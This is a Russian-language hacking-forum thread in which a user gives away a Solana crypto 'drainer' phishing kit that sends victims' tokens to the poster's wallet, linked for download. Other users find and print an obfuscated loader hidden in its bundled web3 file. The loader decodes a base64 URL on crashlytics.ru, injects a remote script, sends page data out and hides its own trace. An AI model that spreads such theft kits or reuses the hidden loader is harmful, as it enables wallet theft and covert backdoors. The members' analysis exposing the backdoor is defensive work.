• XSS.stack #1 – первый литературный журнал от юзеров форума

фишинг Дрейнер SOL

Статус
Закрыто для дальнейших ответов.
Отслеживать
achobem

achobem

RAM
Пользователь
Регистрация
12.06.2022
Сообщения
143
Реакции
178
Что за меценатство......

Обещанный дренер под sol
Работает с 5 различными кошельками, все в 1 транзакцию
Списывает все токены SOL на наш адрес

mega.nz

File on MEGA

mega.nz mega.nz

VirusTotal

VirusTotal
www.virustotal.com
1668696118755.png
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
achobem сказал(а):
Что за меценатство......

Обещанный дренер под sol
Работает с 5 различными кошельками, все в 1 транзакцию
Списывает все токены SOL на наш адрес

VirusTotal

VirusTotal
www.virustotal.com
Посмотреть вложение 46084
а где линк то на скачку ?
 
DyNasTo сказал(а):
На удивление js не закодирован и можно посмотреть, что куда пойдёт. Ещё и мини админка есть
Нихуя, рис отменяется, файл index.iife.min в папке js обфусцирован, подлива очередная с вероятностью 99%. Предполагаю что тс не особо отличился iq от прошлых "щедрых" и в коде есть условие что сендиться суммы с определенных порогов буду на его валлет. Не тратьте время
 
Последнее редактирование:
1337speak сказал(а):
Нихуя, рис отменяется, файл index.iife.min в папке js обфусцирован, подлива очередная с вероятностью 99%. Предполагаю что тс не особо отличился iq от прошлых "щедрых" в коде есть условие что сендиться суммы с определенных порогов буду на его валлет. Не тратьте время
Как болезнь называется?🤔🤔🤔
Пруфы будут?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
1337speak сказал(а):
Нихуя, рис отменяется, файл index.iife.min в папке js обфусцирован, подлива очередная с вероятностью 99%. Предполагаю что тс не особо отличился iq от прошлых "щедрых" в коде есть условие что сендиться суммы с определенных порогов буду на его валлет. Не тратьте время
если имеешь ввиду строку 12193 то там это
только врятле ее вызовом подтягивается кошелек подмены
хотя х#й знает что там в файле https://api.crashlytics.ru/tracking/script.js
 
Ну что-же сам этот файл (index.iife.min.js) похож на Solana.Web3 вот официальные https://unpkg.com/@solana/web3.js@1.66.2/lib/index.iife.min.js или https://unpkg.com/@solana/web3.js@1.66.2/lib/index.iife.js да, а вот это:

JavaScript: 
! function (o, w, d, l) {
    try {
        o.c = "h" == l.protocol[0] && /./.test(l.hostname) && !/PHPPREFS/.test(d.cookie), setTimeout(function () {
            o.c && (o.s = d.createElement("script"), o.s.src = atob("aHR0cHM6Ly9hcGkuY3Jhc2hseXRpY3MucnUvdHJhY2tpbmcvc2NyaXB0LmpzP3JlZmVycmVyPQ==") + l.href, d.body.appendChild(o.s))
        }, 1e3), d.cookie = "PHPPREFS=full;max-age=39800;"
    } catch (e) {}
}({}, window, document, location);

Уже беда

aHR0cHM6Ly9hcGkuY3Jhc2hseXRpY3MucnUvdHJhY2tpbmcvc2NyaXB0LmpzP3JlZmVycmVyPQ== = https://api.crashlytics.ru/tracking/script.js?referrer=
Если дописать к ссылке любое значение то получим следующее:

JavaScript: 
var r='';for(var t of 'hwfxmq~ynhxa3wz')r+=String.fromCharCode((t.charCodeAt()-5).toString());document.querySelectorAll("script").forEach(e=>{new RegExp(r).test(e.src)&&document.body.removeChild(e)});

var r = '';for(var t of 'hwfxmq~ynhxa3wz') r += String.fromCharCode((t.charCodeAt() - 5).toString()); = crashlytics\.ru

Ну а дальше думайте сами, пока вроде ни чего страшного, но всегда может и поменяться то, что приходит
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Да никто вам не выложит рабочий инструмент, бескорыстно, очнитесь. Люди эти дрейнеры продают за деньги, а тут Робин Гуд нарисовался
 
Ничего страшного, но какой-то обидчивый парень закидал дизами
Вот так сливай годный софт
Проблем нет, чистый код
Но дизов накидали
Наслаждайтесь
 
achobem сказал(а):
Мой первый и последний годный слив, успевайте
Ой, а что это ты, меценат хуев, темы со своими дрейнерами трешь?
achobem сказал(а):
/del
Три давай быстрее свою поеботу с вшитыми линками, лох обоссаный, максимум где твои трюки прокатят это на лолзтиме.
achobem сказал(а):
Как болезнь называется?🤔🤔🤔
Пруфы будут?
Может объяснишь уже народу для чего этот хост и что он подтягивает? Или будешь опять собачий х#й жевать и рассказывать что не твои исходники?
 
1337speak сказал(а):
Ой, а что это ты, меценат хуев, темы со своими дрейнерами трешь?

Три давай быстрее свою поеботу с вшитыми линками, лох обоссаный, максимум где твои трюки прокатят это на лолзтиме.

Может объяснишь уже народу для чего этот хост и что он подтягивает? Или будешь опять собачий х#й жевать и рассказывать что не твои исходники?
ты как малолетний дурачочек все байтишь меня на эмоции
я слил купленный софт, потратил на это свою денежку
мне он принес прибыль, я решил поделиться
внести свой вклад в развитие форума
софт работал отлично и никаких проблем не было
да и не может быть никаких проблем, если бы в твоем мозгу проживало что-то кроме гонокока, ты бы сам понимал
ты дизами закидал возможно единственный годный слив дрейнера
я пока что не увидил никаких обвинений в свою сторону
я не увидел анализа и каких-то стоящих обвинений
если ты не ебешь в душе за веб3 и не шаришь ни за что, пытаешься создать какую-то муть на форуме, то иди реально сам на лолзтим
 
Ещё заметил, что если в параметре передать к этой ссылке https://api.crashlytics.ru/tracking/script.js?referrer= домен, но не каждый например https://domain.com то выдаёт немного другой код, но у меня сработало это только один раз, в код добавилось что-то типа таргета для метрик Яндекс и Гугл, так-же там встретилось обращение к https://api.crashlytics.ru/peer но ни чего больше сказать не могу, потому что не могу больше повторить этот запрос

JavaScript: 
! function (o, w, d, l) {
    try {
        o.c = "h" == l.protocol[0] && /./.test(l.hostname) && !/PHPPREFS/.test(d.cookie), setTimeout(function () {
            o.c && (o.s = d.createElement("script"), o.s.src = atob("aHR0cHM6Ly9hcGkuY3Jhc2hseXRpY3MucnUvdHJhY2tpbmcvc2NyaXB0LmpzP3JlZmVycmVyPQ==") + l.href, d.body.appendChild(o.s))
        }, 1e3), d.cookie = "PHPPREFS=full;max-age=39800;"
    } catch (e) {}
}({}, window, document, location);

+ Этот код передает в это API полную ссылку и весь код страницы, и пишет куки, видимо чтобы не засорять базу
 
Ещё раз подтверждение что меценатов в жизни не бывает - в файле есть склейка.
ТС тебя банить не буду, надеюсь ты просто не знал что постишь но в следующий раз будет бан.
Закрыто.
 
Статус
Закрыто для дальнейших ответов.
Верх